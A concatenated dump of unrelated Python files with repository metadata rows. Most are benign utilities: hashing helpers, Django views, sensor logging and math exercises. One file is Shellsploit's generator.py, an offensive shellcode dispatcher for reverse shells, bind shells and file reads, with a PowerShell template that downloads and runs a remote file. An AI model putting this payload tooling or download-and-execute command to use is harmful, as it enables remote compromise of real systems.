chars = '0123456789'
return get_random_string(length, chars)
def get_email_verify_code(length=4):
""" 生成邮箱验证码 """
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' \
+ '0123456789'
return get_random_string(length, chars)
def get_session_id(length=48):
""" 生成session id字符串 """
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' \
+ '0123456789-_'
return get_random_string(length, chars)
def get_invite_code(length=6):
""" 生成邀请码 """
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
return get_random_string(length, chars)
def md5(data):
""" md5算法加密字符串 """
""" type(data): str """
m = hashlib.md5()
m.update(data.encode('utf-8'))
return m.hexdigest()
def b64(data):
""" base64 encode """
""" type(data): str """
base64_encrypt = base64.b64encode(data.encode('utf-8'))
return str(base64_encrypt, 'utf-8')
def b64decode(data):
""" base64 decode """
base64_decrypt = base64.b64decode(data.encode('utf-8'))
return str(base64_decrypt, 'utf-8')
def base64_md5(data):
""" 进行MD5加密,然后Base64编码 """
""" type(data): str """
return b64(md5(data))
| 24.246753 | 76 | 0.658811 | 196 | 1,867 | 6.096939 | 0.372449 | 0.05272 | 0.075314 | 0.087866 | 0.396653 | 0.379916 | 0.293724 | 0.2159 | 0.2159 | 0.175732 | 0 | 0.078788 | 0.204606 | 1,867 | 76 | 77 | 24.565789 | 0.725926 | 0.123728 | 0 | 0.157895 | 0 | 0 | 0.206137 | 0.168112 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.131579 | 0 | 0.657895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d1680b983b55af635dd1b1c4efc3a00f490e8be1 | 10,276 | py | Python | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | 6 | 2018-10-29T19:46:49.000Z | 2022-03-10T15:39:47.000Z | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | null | null | null | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | 4 | 2018-10-16T13:28:27.000Z | 2022-02-05T18:43:57.000Z | #------------------Bombermans Team---------------------------------#
#Author : B3mB4m
#Concat : b3mb4m@protonmail.com
#Project : https://github.com/b3mb4m/Shellsploit
#LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
def generator(choose, shellcode, argv="None", argv2="None"):
    if choose == "linux_x86":
        if shellcode == "bin_sh":
            from Linux86.bin_shx86 import bin_shx86
            return bin_shx86()
        elif shellcode == "exec":
            from Linux86.execc import execc
            return execc(argv)
        elif shellcode == "read":
            from Linux86.readfilex86 import readx86
            from stackconvert import stackconvertSTR
            return readx86(stackconvertSTR(argv))
        elif shellcode == "download&exec":
            from Linux86.download import downloadANDexecute
            from stackconvert import stackconvertSTR
            filename = argv.split("/")[-1]
            return downloadANDexecute(stackconvertSTR(argv), stackconvertSTR(filename))
        elif shellcode == "chmod":
            from Linux86.chmod import ch
            from stackconvert import stackconvertSTR
            return ch(stackconvertSTR(argv))
        elif shellcode == "tcp_bind":
            from Linux86.tcp_bindx86 import tcp_bindx86
            from stackconvert import PORT
            return tcp_bindx86(PORT(argv))
        elif shellcode == "reverse_tcp":
            from Linux86.reverse_tcpx86 import reverse_tcpx86
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcpx86(IP(argv), PORT(argv2))
        elif shellcode == "cd_eject":
            from Linux86.cd_eject import cd_eject
            return cd_eject()
    elif choose == "linux_x64":
        if shellcode == "bin_sh":
            from Linux64.bin_shx64 import bin_shx64
            return bin_shx64()
        elif shellcode == "tcp_bind":
            from Linux64.tcp_bindx64 import tcp_bindx64
            from stackconvert import PORT
            return tcp_bindx64(PORT(argv))
        elif shellcode == "reverse_tcp":
            from Linux64.reverse_tcpx64 import reverse_tcpx64
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcpx64(IP(argv), PORT(argv2))
        elif shellcode == "read":
            from Linux64.readfilex64 import readx64
            from stackconvert import plaintext
            return readx64(plaintext(argv))
    elif choose == "linux":
        from Linux.magic import merlin
        if shellcode == "bin_sh":
            from Linux86.bin_shx86 import bin_shx86
            from Linux64.bin_shx64 import bin_shx64
            # "value" = hex-escaped byte count of the x86 payload, passed to the merlin prefix stub
            value = hex(len(bin_shx86().split("\\x")) - 1)[2:]
            value = "\\x{0}".format(value)
            return merlin(value) + bin_shx86() + bin_shx64()
        elif shellcode == "read":
            from Linux86.readfilex86 import readx86
            from Linux64.readfilex64 import readx64
            from stackconvert import stackconvertSTR
            from stackconvert import plaintext
            value = hex(len(readx86(stackconvertSTR(argv)).split("\\x")) - 1)[2:]
            value = "\\x{0}".format(value)
            return merlin(value) + readx86(stackconvertSTR(argv)) + readx64(plaintext(argv))
        elif shellcode == "reverse_tcp":
            from Linux64.reverse_tcpx64 import reverse_tcpx64
            from Linux86.reverse_tcpx86 import reverse_tcpx86
            from stackconvert import IP
            from stackconvert import PORT
            value = hex(len(reverse_tcpx86(IP(argv), PORT(argv2)).split("\\x")) - 1)[2:]
            value = "\\x{0}".format(value)
            return merlin(value) + reverse_tcpx86(IP(argv), PORT(argv2)) + reverse_tcpx64(IP(argv), PORT(argv2))
        elif shellcode == "tcp_bind":
            from Linux64.tcp_bindx64 import tcp_bindx64
            from Linux86.tcp_bindx86 import tcp_bindx86
            from stackconvert import PORT
            value = hex(len(tcp_bindx86(PORT(argv)).split("\\x")) - 1)[2:]
            value = "\\x{0}".format(value)
            return merlin(value) + tcp_bindx86(PORT(argv)) + tcp_bindx64(PORT(argv))
    elif choose == "osx86":
        if shellcode == "tcp_bind":
            from OSX86.tcp_bind import tcp_bind
            from stackconvert import PORT
            return tcp_bind(PORT(argv))
        elif shellcode == "bin_sh":
            from OSX86.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "reverse_tcp":
            from OSX86.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv), PORT(argv2))
    elif choose == "osx64":
        if shellcode == "bin_sh":
            from OSX64.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "reverse_tcp":
            from OSX64.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv), PORT(argv2))
        elif shellcode == "tcp_bind":
            from OSX64.tcp_bind import tcp_bind
            from stackconvert import PORT
            return tcp_bind(PORT(argv))
    elif choose == "freebsd_x86":
        if shellcode == "bin_sh":
            from FreeBSDx86.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "read":
            from FreeBSDx86.read import read
            from stackconvert import plaintext
            return read(plaintext(argv))
        elif shellcode == "reverse_tcp":
            from FreeBSDx86.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv2), PORT(argv))
        elif shellcode == "reverse_tcp2":
            from FreeBSDx86.reverse_tcp2 import reverse_tcp2
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp2(IP(argv2), PORT(argv))
        elif shellcode == "tcp_bind":
            from FreeBSDx86.tcp_bind import tcp_bind
            # pack the port number as two escaped hex bytes (big-endian),
            # zero-padding when the hex value is shorter than four digits
            if len(str(argv)) == 5:
                PORT = "\\x{0}\\x{1}".format(*(hex(int(argv))[2:][0:2], hex(int(argv))[2:][2:]))
            else:
                PORT = "\\x{0}\\x{1}".format(*("0" + hex(int(argv))[2:][0], hex(int(argv))[2:][1:]))
            return tcp_bind(PORT)
        elif shellcode == "exec":
            from FreeBSDx86.execc import execc
            from stackconvert import plaintext
            command = '/bin/sh -c {0}'.format(argv)
            return execc(plaintext(argv))
    elif choose == "freebsd_x64":
        if shellcode == "bin_sh":
            from FreeBSDx64.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "exec":
            from FreeBSDx64.execc import execc
            from stackconvert import plaintext
            command = '/bin/sh -c {0}'.format(argv)
            return execc(plaintext(argv))
        elif shellcode == "tcp_bind":
            from stackconvert import plaintext
            from stackconvert import PORT
            from FreeBSDx64.tcp_bind import tcp_bind
            return tcp_bind(PORT(argv), plaintext(argv2))
        elif shellcode == "reverse_tcp":
            from FreeBSDx64.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv), PORT(argv2))
    elif choose == "linux_arm":
        if shellcode == "chmod":
            from LinuxARM.chmod import chmod
            from stackconvert import plaintext
            if argv == "None":
                return "FILE PATH must be declared."
            else:
                return chmod(plaintext(argv))
        elif shellcode == "bin_sh":
            from LinuxARM.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "exec":
            from LinuxARM.execc import execc
            return execc(argv)
        elif shellcode == "reverse_tcp":
            from LinuxARM.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv2), PORT(argv))
    elif choose == "linux_mips":
        if shellcode == "reverse_tcp":
            from LinuxMIPS.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            return reverse_tcp(IP(argv), PORT(argv2))
        elif shellcode == "bin_sh":
            from LinuxMIPS.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "chmod":
            from LinuxMIPS.chmod import chmod
            from stackconvert import plaintext
            return chmod(plaintext(argv))
        elif shellcode == "tcp_bind":
            from LinuxMIPS.tcp_bind import tcp_bind
            from stackconvert import PORT
            return tcp_bind(PORT(argv))
    elif choose == "windows":
        if shellcode == "messagebox":
            from Windows import messagebox
            from stackconvert import stackconvertSTR
            if argv == "None":
                return messagebox.messagebox(False)
            else:
                return messagebox.messagebox(stackconvertSTR(argv, True))
        elif shellcode == "downloadandexecute":
            from Windows.downloadandexecute import downANDexecute
            from stackconvert import rawSTR
            from stackconvert import stackconvertSTR
            if argv2 == "None":
                argv2 = argv.split("/")[-1]
            powershell = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s') ;(New-Object -com Shell.Application).ShellExecute('%s');}"''' % (argv, argv2, argv2)
            return downANDexecute(payload=stackconvertSTR(powershell))
        elif shellcode == "exec":
            from Windows.execc import WinExec
            return WinExec(argv)
        elif shellcode == "tcp_bind":
            from Windows.bind_tcp import PayloadModule
            return PayloadModule(argv).gen_shellcode()
        elif shellcode == "reverse_tcp":
            from Windows.rev_tcp import PayloadModule
            return PayloadModule(argv, argv2).gen_shellcode()
    elif choose == "solarisx86":
        if shellcode == "read":
            from Solarisx86.read import read
            from stackconvert import plaintext
            return read(plaintext(argv))
        elif shellcode == "reverse_tcp":
            from Solarisx86.reverse_tcp import reverse_tcp
            from stackconvert import IP
            from stackconvert import PORT
            #return reverse_tcp(host=IP(argv), port=PORT(argv2))
            dombili = IP(argv)
            kocakari = PORT(argv2)
            return reverse_tcp(host=dombili, port=kocakari)
        elif shellcode == "bin_sh":
            from Solarisx86.bin_sh import bin_sh
            return bin_sh()
        elif shellcode == "tcp_bind":
            from Solarisx86.tcp_bind import tcp_bind
            from stackconvert import PORT
            return tcp_bind(PORT(argv))
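The freebsd_x86 `tcp_bind` branch above hand-formats the port number into two escaped hex bytes, with a manual zero-padding case. As a sketch, the same big-endian packing can be done uniformly with the standard `struct` module (the helper name `port_to_hex_bytes` is my own, not part of Shellsploit):

```python
import struct


def port_to_hex_bytes(port):
    """Pack a TCP port as two escaped hex bytes, big-endian (network order)."""
    hi, lo = struct.pack(">H", port)  # Python 3: iterating bytes yields ints
    return "\\x{0:02x}\\x{1:02x}".format(hi, lo)


# 4444 == 0x115c
print(port_to_hex_bytes(4444))  # \x11\x5c
```

Because `struct.pack(">H", ...)` always produces exactly two bytes, the length-5 special case in the original code becomes unnecessary.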
| 34.139535 | 201 | 0.647042 | 1,211 | 10,276 | 5.367465 | 0.09744 | 0.113231 | 0.155692 | 0.076 | 0.683231 | 0.605692 | 0.528 | 0.484462 | 0.448769 | 0.427538 | 0 | 0.033868 | 0.247178 | 10,276 | 300 | 202 | 34.253333 | 0.80636 | 0.033476 | 0 | 0.580508 | 0 | 0.004237 | 0.074675 | 0.007357 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.423729 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
d16a18b5e5a64b815eb735cb177e88912486769f | 1,020 | py | Python | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django_tables2 import RequestConfig
from django.views.generic.detail import DetailView
from django.db.models import Count
from crew.models import Person
from .models import Bomber
from .tables import BomberTable
def bomber(request):
    table = BomberTable(Bomber.objects.all())
    RequestConfig(request).configure(table)
    object_list = Bomber.objects.all()
    return render(request, 'bomber/list_bomber.html', {'table': table, 'object_list': object_list})


class BomberDetailView(DetailView):
    model = Bomber

    def get_context_data(self, **kwargs):
        context = super(BomberDetailView, self).get_context_data(**kwargs)
        current_object = self.object
        context['destiny'] = Person.objects.filter(bomber=current_object.id).values('destiny_checked').annotate(total=Count('destiny_checked')).order_by('destiny_checked')
        context['crew_list'] = Person.objects.filter(bomber=current_object.id).order_by('destiny_checked')
        return context
| 37.777778 | 171 | 0.755882 | 126 | 1,020 | 5.968254 | 0.380952 | 0.053191 | 0.042553 | 0.066489 | 0.106383 | 0.106383 | 0.106383 | 0 | 0 | 0 | 0 | 0.001133 | 0.134314 | 1,020 | 26 | 172 | 39.230769 | 0.85051 | 0 | 0 | 0 | 0 | 0 | 0.112745 | 0.022549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.35 | 0 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
66f44f9766c4d040eac6704c6c2ae8556c45fffa | 342 | py | Python | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | import time
import requests
INFLUX_URL = 'http://localhost:8086/write?db=DHT22'
def sendDataToGrafana(humidity, temp, pressure):
    requests.post(INFLUX_URL, data='temperature value=' + str(temp))
    requests.post(INFLUX_URL, data='humidity value=' + str(humidity))
    requests.post(INFLUX_URL, data='pressure value=' + str(pressure))
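The function above issues one HTTP POST per measurement. InfluxDB's write endpoint accepts several newline-separated line-protocol entries in a single request body, so the three writes could be batched into one; a sketch of the payload-building half (the helper name `build_influx_payload` is mine):

```python
def build_influx_payload(humidity, temp, pressure):
    """Join three InfluxDB line-protocol entries so one POST can carry them all."""
    lines = [
        'temperature value=' + str(temp),
        'humidity value=' + str(humidity),
        'pressure value=' + str(pressure),
    ]
    return '\n'.join(lines)


# Usage sketch, assuming the INFLUX_URL defined above:
# requests.post(INFLUX_URL, data=build_influx_payload(55.2, 21.7, 1013.2))
print(build_influx_payload(55.2, 21.7, 1013.2))
```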
| 28.5 | 69 | 0.736842 | 44 | 342 | 5.636364 | 0.477273 | 0.145161 | 0.217742 | 0.254032 | 0.302419 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.122807 | 342 | 11 | 70 | 31.090909 | 0.806667 | 0 | 0 | 0 | 0 | 0 | 0.246334 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
66ff808193f491101625deb10d4b03096229d8fa | 204 | py | Python | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | 2 | 2021-10-05T16:37:30.000Z | 2021-10-11T21:31:43.000Z | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | null | null | null | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | 1 | 2021-07-16T02:23:37.000Z | 2021-07-16T02:23:37.000Z | # imports - module imports
from deeply.exception import (
    DeeplyError
)
# imports - test imports
import pytest
def test_deeply_error():
    with pytest.raises(DeeplyError):
        raise DeeplyError
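`pytest.raises` is essentially a context-manager wrapper around try/except: the test passes only if the body raises the expected exception type. A stdlib-only sketch of that check (the helper `assert_raises` and the stand-in `DeeplyError` class are mine, for illustration):

```python
def assert_raises(exc_type, fn, *args, **kwargs):
    """Return True if calling fn raises exc_type (or a subclass), else False."""
    try:
        fn(*args, **kwargs)
    except exc_type:
        return True
    return False


class DeeplyError(Exception):  # stand-in for deeply.exception.DeeplyError
    pass


def boom():
    raise DeeplyError


print(assert_raises(DeeplyError, boom))  # True
```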
66ffbb10c3681dba5f743ff2d041228d5ccdc263 | 1,153 | py | Python | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | """ Common setup and patching for tests """
#pylint: disable=wrong-import-order
from datetime import datetime as orig_datetime, timedelta
from mock import patch
import threading
#pylint: disable=W0401,W0614
from test.fixtures import *
_thread_state = threading.local()
def _new_utcnow():
""" Return last set datetime, or set it to current datetime if not set """
if not hasattr(_thread_state, 'utcnow'):
_thread_state.utcnow = orig_datetime.utcnow()
return _thread_state.utcnow
def _new_now():
""" Work out current local datetime """
return _new_utcnow() + (orig_datetime.now() - orig_datetime.utcnow())
def clock_load(utcnow):
""" Set datetime """
_thread_state.utcnow = utcnow
return _thread_state.utcnow
def clock_tick(delta=timedelta()):
""" Tick clock """
return clock_load(_new_utcnow() + delta)
def clock_reset():
""" Forget set datetime """
if hasattr(_thread_state, 'utcnow'):
delattr(_thread_state, 'utcnow')
_config = {'utcnow.side_effect': _new_utcnow,
'now.side_effect': _new_now}
_patcher = patch('datetime.datetime', **_config)
_mocker = _patcher.start()
| 28.825 | 78 | 0.70425 | 147 | 1,153 | 5.231293 | 0.37415 | 0.114434 | 0.154746 | 0.062419 | 0.083225 | 0.083225 | 0 | 0 | 0 | 0 | 0 | 0.008412 | 0.175195 | 1,153 | 39 | 79 | 29.564103 | 0.80021 | 0.213356 | 0 | 0.086957 | 0 | 0 | 0.078251 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.173913 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0f03c437607dd785e33ff9e71aa3dbb48d46d5a4 | 1,314 | py | Python | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | #! /usr/bin/env python
"""
Author: LiangLiang ZHENG
Date:
File Description
"""
from __future__ import print_function

import sys
import os
import time
import argparse

sys.path.append('..')

import numpy as np
from keras import backend as K
from utils.cha_level_helper import output_sequence
# TODO: still need to be tested
def get_predictions_then_print(data, label, mode, model, model_path):
    """ Print a model's decoded predictions
    Params:
        data: input features for the dataset partition
        label: ground-truth label sequences
        mode: which dataset partition is being used
        model: model will be used
        model_path (str): model checkpoint
    """
    # Load the acoustic model's checkpoint once, outside the loop
    model.load_weights(model_path)
    data_len = len(data)
    for i in range(data_len):
        # Obtain and decode the acoustic model's predictions
        prediction = model.predict(data[i])
        output_length = [model.output_length(data[i].shape[1])]
        # why + 1?
        pred_ints = (K.eval(K.ctc_decode(
            prediction, output_length)[0][0])).flatten().tolist()
        # Display the true and predicted transcriptions
        print('-' * 80)
        print('Ground Truth:\n' + '\n' + output_sequence(label[i]))
        print('-' * 80)
        print('Predicted seq:\n' + '\n' + ''.join(output_sequence(pred_ints)))
        print('-' * 80)
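`K.ctc_decode` above performs CTC decoding, whose core step drops blank symbols and collapses consecutive repeats. A minimal pure-Python sketch of that greedy collapse (illustrative only; the real Keras call also does the per-frame argmax and beam handling):

```python
def greedy_ctc_collapse(ids, blank=0):
    """Collapse repeated symbols and remove blanks, as CTC greedy decoding does."""
    out = []
    prev = None
    for i in ids:
        if i != prev and i != blank:
            out.append(i)
        prev = i
    return out


print(greedy_ctc_collapse([1, 1, 0, 1, 2, 2, 0]))  # [1, 1, 2]
```

Note how the blank between the two 1s preserves the repeated symbol, while the adjacent 2s collapse to one.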
| 28.565217 | 80 | 0.649924 | 179 | 1,314 | 4.631285 | 0.536313 | 0.050663 | 0.036188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00995 | 0.23516 | 1,314 | 45 | 81 | 29.2 | 0.814925 | 0.311263 | 0 | 0.217391 | 0 | 0 | 0.046404 | 0 | 0 | 0 | 0 | 0.022222 | 0 | 1 | 0.043478 | false | 0 | 0.391304 | 0 | 0.434783 | 0.304348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0f0a874b832d5307c77060e388ac90f502854fe7 | 852 | py | Python | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | 6 | 2020-07-05T05:15:19.000Z | 2021-01-24T20:17:14.000Z | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | null | null | null | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | 2 | 2020-09-14T06:46:37.000Z | 2021-06-15T09:17:21.000Z | from algo.number_theory.extended_gcd.extended_gcd import extended_gcd
from algo.number_theory.eulers_totient_function.eulers_totient import etf
def mod_inverse_gcd(a, m):
    '''
    a and m should be coprime!
    Complexity -> O(log(m)).
    '''
    return extended_gcd(a, m)[0]


def mod_inverse_eulers(a, m):
    '''
    a and m should be coprime.
    Complexity -> O(sqrt(m) + log(m)).
    '''
    etf_m = etf(m)
    return pow(a, etf_m - 1, m)


def mod_inverse_fermat(a, p):
    '''
    p must be prime and a should not be a multiple of p.
    Is a special case of Euler's Totient function actually.
    Complexity -> O(log(p)).
    '''
    return pow(a, p - 2, p)


def main():
    a = 7
    m = 5
    print(mod_inverse_gcd(7, 5))
    print(mod_inverse_fermat(7, 5))
    print(mod_inverse_eulers(7, 5))


if __name__ == "__main__":
    main()
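All three functions above must agree on coprime inputs; for instance the inverse of 7 mod 5 is 3, since 7 * 3 = 21 ≡ 1 (mod 5). A self-contained cross-check using Fermat's method and an iterative extended Euclid (independent of the `algo` package imported above; function names here are my own):

```python
def ext_gcd(a, b):
    """Iterative extended Euclid: returns (g, x, y) with a*x + b*y == g."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y


def inv_gcd(a, m):
    g, x, _ = ext_gcd(a, m)
    assert g == 1, "a and m must be coprime"
    return x % m


def inv_fermat(a, p):
    return pow(a, p - 2, p)  # valid only for prime p


print(inv_gcd(7, 5), inv_fermat(7, 5))  # 3 3
```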
| 20.780488 | 73 | 0.627934 | 140 | 852 | 3.6 | 0.342857 | 0.119048 | 0.077381 | 0.095238 | 0.198413 | 0.130952 | 0.130952 | 0.130952 | 0.130952 | 0.130952 | 0 | 0.017054 | 0.242958 | 852 | 40 | 74 | 21.3 | 0.764341 | 0.289906 | 0 | 0 | 0 | 0 | 0.014733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.117647 | 0 | 0.529412 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0f116262d51df870092baaa77da7c1a3942b13fa | 121 | py | Python | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | null | null | null | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | null | null | null | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | 2 | 2020-12-27T15:03:46.000Z | 2021-03-06T14:13:34.000Z | N = int(input())
def factorial(N):
if N == 0:
return 1
return N * factorial(N-1)
print(factorial(N))
| 11 | 29 | 0.545455 | 19 | 121 | 3.473684 | 0.526316 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.297521 | 121 | 10 | 30 | 12.1 | 0.741176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.5 | 0.166667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f1b976e46c7f2ba93a9ecff9c247ef02d3200d7 | 774 | py | Python | benchmark/python/tpch_base.py | alefranz/spark | f5f15379b2c080339a36423b0262f29d978fd362 | [
"MIT"
] | 1 | 2019-06-14T09:25:43.000Z | 2019-06-14T09:25:43.000Z | benchmark/python/tpch_base.py | tianyaba/spark | f1c5b86d84bc91cb2d6f5aaf3d2a401de6fd4098 | [
"MIT"
] | null | null | null | benchmark/python/tpch_base.py | tianyaba/spark | f1c5b86d84bc91cb2d6f5aaf3d2a401de6fd4098 | [
"MIT"
] | null | null | null | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
import pyspark
from pyspark.sql import SparkSession
class TpchBase:
    def __init__(self, spark, dir):
        self.customer = spark.read.parquet(dir + "customer")
        self.lineitem = spark.read.parquet(dir + "lineitem")
        self.nation = spark.read.parquet(dir + "nation")
        self.region = spark.read.parquet(dir + "region")
        self.orders = spark.read.parquet(dir + "orders")
        self.part = spark.read.parquet(dir + "part")
        self.partsupp = spark.read.parquet(dir + "partsupp")
        self.supplier = spark.read.parquet(dir + "supplier")
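The eight parquet reads above all follow one pattern, so the table names can be kept in data and the attributes set in a loop. A sketch with an injectable `reader` callable standing in for `spark.read.parquet` (class and variable names here are my own, not from the benchmark code):

```python
# The eight TPC-H tables loaded by TpchBase above.
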